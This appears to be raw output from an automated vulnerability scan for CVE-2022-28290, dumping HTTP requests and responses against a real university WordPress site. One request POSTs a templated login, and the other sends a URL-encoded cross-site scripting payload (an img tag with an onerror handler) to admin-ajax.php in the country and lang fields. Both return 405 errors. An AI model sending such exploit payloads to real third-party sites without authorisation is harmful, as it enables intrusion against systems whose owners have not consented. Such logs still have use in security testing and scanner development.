[CVE-2022-28290] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-login.php


POST /wp-login.php HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
[CVE-2022-28290] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-login.php

HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 422
Allow: GET, HEAD, OPTIONS
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:19:01 GMT
Server: AmazonS3
Via: 1.1 c00b9a9d46446e53268f343cad13e4d8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2UXe2M9l9t_vH3CIgpe7YsW81n_yB68eXyWlfKk_WJNha3RISxmTWQ==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>405 Method Not Allowed</title></head>
<body>
<h1>405 Method Not Allowed</h1>
<ul>
<li>Code: MethodNotAllowed</li>
<li>Message: The specified method is not allowed against this resource.</li>
<li>Method: POST</li>
<li>ResourceType: OBJECT</li>
<li>RequestId: YT0P2AEQFQJKPYHN</li>
<li>HostId: UdXFoQtVMzlfysbIfMI5jTZMA0LikkZs9h0oOT46WQQNqacqZ6+wJ90EaaFYqjf3J/Bx2Psu/Mk=</li>
</ul>
<hr/>
</body>
</html>

[CVE-2022-28290] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php?action=check_country_selector


POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US
[CVE-2022-28290] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php?action=check_country_selector

HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 422
Allow: GET, HEAD, OPTIONS
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:19:02 GMT
Server: AmazonS3
Via: 1.1 67e0252f80139a17537e71117acd6be0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ZIbwBEA-EQw0p4aLJ0bQZjiP2mqGOUcrn4uKTbxKKCdI1JO44wxjRQ==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>405 Method Not Allowed</title></head>
<body>
<h1>405 Method Not Allowed</h1>
<ul>
<li>Code: MethodNotAllowed</li>
<li>Message: The specified method is not allowed against this resource.</li>
<li>Method: POST</li>
<li>ResourceType: OBJECT</li>
<li>RequestId: YT0W9DSFSEH1E5JQ</li>
<li>HostId: ARdxIpDK+7sMYH6G9u0GJL3snbBT9SWSbYExAm8kVqSQSG4uR22jKARagRa+QZbtLwDzvkgMXjQ=</li>
</ul>
<hr/>
</body>
</html>

